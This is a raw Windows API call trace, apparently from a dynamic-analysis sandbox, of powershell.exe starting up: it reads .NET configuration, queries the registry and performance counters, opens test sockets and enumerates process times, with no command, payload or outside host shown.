	[0152.178] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c68c6c0 | out: lpFileInformation=0x1c68c6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c68c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0152.258] SetErrorMode (uMode=0x1) returned 0x1
	[0152.258] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x37c
	[0152.258] GetFileType (hFile=0x37c) returned 0x1
	[0152.258] SetErrorMode (uMode=0x1) returned 0x1
	[0152.258] GetFileType (hFile=0x37c) returned 0x1
	[0152.261] GetFileSize (in: hFile=0x37c, lpFileSizeHigh=0x1c68c6b8 | out: lpFileSizeHigh=0x1c68c6b8*=0x0) returned 0x622a
	[0152.261] ReadFile (in: hFile=0x37c, lpBuffer=0x2fcf820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c5d8, lpOverlapped=0x0 | out: lpBuffer=0x2fcf820*, lpNumberOfBytesRead=0x1c68c5d8*=0x1000, lpOverlapped=0x0) returned 1
	[0152.274] ReadFile (in: hFile=0x37c, lpBuffer=0x2fcf820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c108, lpOverlapped=0x0 | out: lpBuffer=0x2fcf820*, lpNumberOfBytesRead=0x1c68c108*=0x1000, lpOverlapped=0x0) returned 1
	[0152.275] ReadFile (in: hFile=0x37c, lpBuffer=0x2fcf820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c108, lpOverlapped=0x0 | out: lpBuffer=0x2fcf820*, lpNumberOfBytesRead=0x1c68c108*=0x1000, lpOverlapped=0x0) returned 1
	[0152.275] ReadFile (in: hFile=0x37c, lpBuffer=0x2fcf820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c108, lpOverlapped=0x0 | out: lpBuffer=0x2fcf820*, lpNumberOfBytesRead=0x1c68c108*=0x1000, lpOverlapped=0x0) returned 1
	[0152.275] ReadFile (in: hFile=0x37c, lpBuffer=0x2fcf820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c108, lpOverlapped=0x0 | out: lpBuffer=0x2fcf820*, lpNumberOfBytesRead=0x1c68c108*=0x1000, lpOverlapped=0x0) returned 1
	[0152.285] ReadFile (in: hFile=0x37c, lpBuffer=0x2fcf820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c248, lpOverlapped=0x0 | out: lpBuffer=0x2fcf820*, lpNumberOfBytesRead=0x1c68c248*=0x1000, lpOverlapped=0x0) returned 1
	[0153.189] ReadFile (in: hFile=0x37c, lpBuffer=0x2e6eb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c0c8, lpOverlapped=0x0 | out: lpBuffer=0x2e6eb10*, lpNumberOfBytesRead=0x1c68c0c8*=0x22a, lpOverlapped=0x0) returned 1
	[0153.189] ReadFile (in: hFile=0x37c, lpBuffer=0x2e6eb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c168, lpOverlapped=0x0 | out: lpBuffer=0x2e6eb10*, lpNumberOfBytesRead=0x1c68c168*=0x0, lpOverlapped=0x0) returned 1
	[0153.190] CloseHandle (hObject=0x37c) returned 1
	[0153.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c68c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c68c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.192] CoTaskMemAlloc (cb=0x20c) returned 0x1b829570
	[0153.192] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b829570, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0153.193] CoTaskMemFree (pv=0x1b829570) 
	[0153.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c68c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0153.194] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.194] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c8c8 | out: TokenHandle=0x1c68c8c8*=0x37c) returned 1
	[0153.195] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.195] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c8c8 | out: TokenHandle=0x1c68c8c8*=0x354) returned 1
	[0153.198] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.198] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c668 | out: TokenHandle=0x1c68c668*=0x378) returned 1
	[0153.199] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c68c710 | out: lpFileInformation=0x1c68c710*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0153.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c68c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.201] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c68c6c0 | out: lpFileInformation=0x1c68c6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0153.202] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.202] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c8c8 | out: TokenHandle=0x1c68c8c8*=0x380) returned 1
	[0153.203] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.203] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c8c8 | out: TokenHandle=0x1c68c8c8*=0x384) returned 1
	[0153.339] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.339] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c548 | out: TokenHandle=0x1c68c548*=0x388) returned 1
	[0153.637] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.637] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c548 | out: TokenHandle=0x1c68c548*=0x3c0) returned 1
	[0153.666] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c68cc68 | out: lpWSAData=0x1c68cc68) returned 0
	[0153.774] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c68bd88 | out: phkResult=0x1c68bd88*=0x39c) returned 0x0
	[0153.774] RegQueryValueExW (in: hKey=0x39c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c68bd0c, lpData=0x0, lpcbData=0x1c68bd08*=0x0 | out: lpType=0x1c68bd0c*=0x1, lpData=0x0, lpcbData=0x1c68bd08*=0xe) returned 0x0
	[0153.774] CoTaskMemAlloc (cb=0x12) returned 0x1b85b960
	[0153.774] RegQueryValueExW (in: hKey=0x39c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c68bcdc, lpData=0x1b85b960, lpcbData=0x1c68bcd8*=0xe | out: lpType=0x1c68bcdc*=0x1, lpData="Client", lpcbData=0x1c68bcd8*=0xe) returned 0x0
	[0153.774] CoTaskMemFree (pv=0x1b85b960) 
	[0153.774] RegCloseKey (hKey=0x39c) returned 0x0
	[0153.779] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ac
	[0153.783] setsockopt (s=0x3ac, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0153.783] closesocket (s=0x3ac) returned 0
	[0153.784] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ac
	[0153.786] setsockopt (s=0x3ac, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0153.786] closesocket (s=0x3ac) returned 0
	[0153.793] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.793] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c4e8 | out: TokenHandle=0x1c68c4e8*=0x3ac) returned 1
	[0153.807] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.807] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c4e8 | out: TokenHandle=0x1c68c4e8*=0x3d0) returned 1
	[0153.960] GetCurrentProcessId () returned 0x120
	[0153.976] CoTaskMemAlloc (cb=0x204) returned 0x286dd0
	[0153.976] GetComputerNameW (in: lpBuffer=0x286dd0, nSize=0x2e93fe8 | out: lpBuffer="XDUWTFONO", nSize=0x2e93fe8) returned 1
	[0153.976] CoTaskMemFree (pv=0x286dd0) 
	[0153.977] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c68c9c8 | out: phkResult=0x1c68c9c8*=0x3d4) returned 0x0
	[0153.977] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Library", lpReserved=0x0, lpType=0x1c68c94c, lpData=0x0, lpcbData=0x1c68c948*=0x0 | out: lpType=0x1c68c94c*=0x1, lpData=0x0, lpcbData=0x1c68c948*=0x1c) returned 0x0
	[0153.977] CoTaskMemAlloc (cb=0x20) returned 0x2fc9f0
	[0153.977] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Library", lpReserved=0x0, lpType=0x1c68c91c, lpData=0x2fc9f0, lpcbData=0x1c68c918*=0x1c | out: lpType=0x1c68c91c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c68c918*=0x1c) returned 0x0
	[0153.977] CoTaskMemFree (pv=0x2fc9f0) 
	[0153.977] RegQueryValueExW (in: hKey=0x3d4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c68c94c, lpData=0x0, lpcbData=0x1c68c948*=0x0 | out: lpType=0x1c68c94c*=0x4, lpData=0x0, lpcbData=0x1c68c948*=0x4) returned 0x0
	[0153.978] RegQueryValueExW (in: hKey=0x3d4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c68c950, lpData=0x1c68c94c, lpcbData=0x1c68c948*=0x4 | out: lpType=0x1c68c950*=0x4, lpData=0x1c68c94c*=0x1, lpcbData=0x1c68c948*=0x4) returned 0x0
	[0153.978] RegQueryValueExW (in: hKey=0x3d4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c68c94c, lpData=0x0, lpcbData=0x1c68c948*=0x0 | out: lpType=0x1c68c94c*=0x4, lpData=0x0, lpcbData=0x1c68c948*=0x4) returned 0x0
	[0153.979] RegQueryValueExW (in: hKey=0x3d4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c68c950, lpData=0x1c68c94c, lpcbData=0x1c68c948*=0x4 | out: lpType=0x1c68c950*=0x4, lpData=0x1c68c94c*=0x137a, lpcbData=0x1c68c948*=0x4) returned 0x0
	[0153.979] RegCloseKey (hKey=0x3d4) returned 0x0
	[0153.982] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c68c988 | out: phkResult=0x1c68c988*=0x3d4) returned 0x0
	[0153.983] RegQueryValueExW (in: hKey=0x3d4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c68c90c, lpData=0x0, lpcbData=0x1c68c908*=0x0 | out: lpType=0x1c68c90c*=0x4, lpData=0x0, lpcbData=0x1c68c908*=0x4) returned 0x0
	[0153.983] RegQueryValueExW (in: hKey=0x3d4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c68c910, lpData=0x1c68c90c, lpcbData=0x1c68c908*=0x4 | out: lpType=0x1c68c910*=0x4, lpData=0x1c68c90c*=0x3, lpcbData=0x1c68c908*=0x4) returned 0x0
	[0153.983] RegQueryValueExW (in: hKey=0x3d4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c68c90c, lpData=0x0, lpcbData=0x1c68c908*=0x0 | out: lpType=0x1c68c90c*=0x4, lpData=0x0, lpcbData=0x1c68c908*=0x4) returned 0x0
	[0153.983] RegQueryValueExW (in: hKey=0x3d4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c68c910, lpData=0x1c68c90c, lpcbData=0x1c68c908*=0x4 | out: lpType=0x1c68c910*=0x4, lpData=0x1c68c90c*=0x20000, lpcbData=0x1c68c908*=0x4) returned 0x0
	[0153.983] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c68c90c, lpData=0x0, lpcbData=0x1c68c908*=0x0 | out: lpType=0x1c68c90c*=0x3, lpData=0x0, lpcbData=0x1c68c908*=0xaa) returned 0x0
	[0153.983] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c68c90c, lpData=0x2e972d8, lpcbData=0x1c68c908*=0xaa | out: lpType=0x1c68c90c*=0x3, lpData=0x2e972d8*, lpcbData=0x1c68c908*=0xaa) returned 0x0
	[0153.988] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0154.117] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c68c8c0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0154.118] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3e0
	[0154.121] MapViewOfFile (hFileMappingObject=0x3e0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1b3d0000
	[0154.122] VirtualQuery (in: lpAddress=0x1b3d0000, lpBuffer=0x1c68c8b8, dwLength=0x30 | out: lpBuffer=0x1c68c8b8*(BaseAddress=0x1b3d0000, AllocationBase=0x1b3d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0154.123] LocalFree (hMem=0x1b826860) returned 0x0
	[0154.123] RegCloseKey (hKey=0x3d4) returned 0x0
	[0154.126] GetVersionExW (in: lpVersionInformation=0x1c68b890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c68b890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0154.128] GetVersionExW (in: lpVersionInformation=0x1c68b860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c68b860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0154.129] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e97fa8, cbSid=0x1c68c8a0 | out: pSid=0x2e97fa8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8a0) returned 1
	[0154.132] CreateMutexW (lpMutexAttributes=0x2e981b0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.133] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.137] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0154.146] GetCurrentProcessId () returned 0x120
	[0154.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x3e4
	[0154.148] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c68c7b0, lpExitTime=0x1c68c7a8, lpKernelTime=0x1c68c7a0, lpUserTime=0x1c68c798 | out: lpCreationTime=0x1c68c7b0, lpExitTime=0x1c68c7a8, lpKernelTime=0x1c68c7a0, lpUserTime=0x1c68c798) returned 1
	[0154.149] CloseHandle (hObject=0x3e4) returned 1
	[0154.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3e4
	[0154.149] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828 | out: lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828) returned 1
	[0154.149] CloseHandle (hObject=0x3e4) returned 1
	[0154.150] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3e4
	[0154.151] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.151] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.152] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68c798, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68c798*=0x3e8) returned 1
	[0154.154] CloseHandle (hObject=0x3e8) returned 1
	[0154.155] CloseHandle (hObject=0x3e4) returned 1
	[0154.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x3e4
	[0154.155] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828 | out: lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828) returned 1
	[0154.155] CloseHandle (hObject=0x3e4) returned 1
	[0154.155] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x3e4
	[0154.155] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.155] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.155] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68c798, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68c798*=0x3e8) returned 1
	[0154.156] CloseHandle (hObject=0x3e8) returned 1
	[0154.156] CloseHandle (hObject=0x3e4) returned 1
	[0154.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3e4
	[0154.156] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828 | out: lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828) returned 1
	[0154.157] CloseHandle (hObject=0x3e4) returned 1
	[0154.157] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3e4
	[0154.157] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.157] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.157] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68c798, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68c798*=0x3e8) returned 1
	[0154.157] CloseHandle (hObject=0x3e8) returned 1
	[0154.157] CloseHandle (hObject=0x3e4) returned 1
	[0154.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3e4
	[0154.158] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828 | out: lpCreationTime=0x1c68c840, lpExitTime=0x1c68c838, lpKernelTime=0x1c68c830, lpUserTime=0x1c68c828) returned 1
	[0154.158] CloseHandle (hObject=0x3e4) returned 1
	[0154.158] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3e4
	[0154.158] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.158] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.158] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68c798, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68c798*=0x3e8) returned 1
	[0154.159] CloseHandle (hObject=0x3e8) returned 1
	[0154.159] CloseHandle (hObject=0x3e4) returned 1
	[0154.210] ReleaseMutex (hMutex=0x3d4) returned 1
	[0154.248] CloseHandle (hObject=0x3d4) returned 1
	[0154.248] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e99220, cbSid=0x1c68c8a0 | out: pSid=0x2e99220*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8a0) returned 1
	[0154.248] CreateMutexW (lpMutexAttributes=0x2e993d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.248] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0154.250] ReleaseMutex (hMutex=0x3d4) returned 1
	[0154.250] CloseHandle (hObject=0x3d4) returned 1
	[0154.250] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e9a048, cbSid=0x1c68c8a0 | out: pSid=0x2e9a048*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8a0) returned 1
	[0154.250] CreateMutexW (lpMutexAttributes=0x2e9a200, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.250] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0154.251] ReleaseMutex (hMutex=0x3d4) returned 1
	[0154.252] CloseHandle (hObject=0x3d4) returned 1
	[0154.252] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e9ae80, cbSid=0x1c68c8a0 | out: pSid=0x2e9ae80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8a0) returned 1
	[0154.252] CreateMutexW (lpMutexAttributes=0x2e9b038, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.252] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0154.253] ReleaseMutex (hMutex=0x3d4) returned 1
	[0154.253] CloseHandle (hObject=0x3d4) returned 1
	[0154.254] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e9bcb0, cbSid=0x1c68c8a0 | out: pSid=0x2e9bcb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8a0) returned 1
	[0154.254] CreateMutexW (lpMutexAttributes=0x2e9be68, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.254] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0154.255] ReleaseMutex (hMutex=0x3d4) returned 1
	[0154.255] CloseHandle (hObject=0x3d4) returned 1
	[0154.258] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e9cae0, cbSid=0x1c68c850 | out: pSid=0x2e9cae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c850) returned 1
	[0154.258] CreateMutexW (lpMutexAttributes=0x2e9cc98, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.258] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0154.259] ReleaseMutex (hMutex=0x3d4) returned 1
	[0154.259] CloseHandle (hObject=0x3d4) returned 1
	[0154.260] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e9d900, cbSid=0x1c68c850 | out: pSid=0x2e9d900*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c850) returned 1
	[0154.260] CreateMutexW (lpMutexAttributes=0x2e9dab8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.260] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0154.261] ReleaseMutex (hMutex=0x3d4) returned 1
	[0154.261] CloseHandle (hObject=0x3d4) returned 1
	[0154.261] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e9e718, cbSid=0x1c68c850 | out: pSid=0x2e9e718*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c850) returned 1
	[0154.262] CreateMutexW (lpMutexAttributes=0x2e9e8d0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
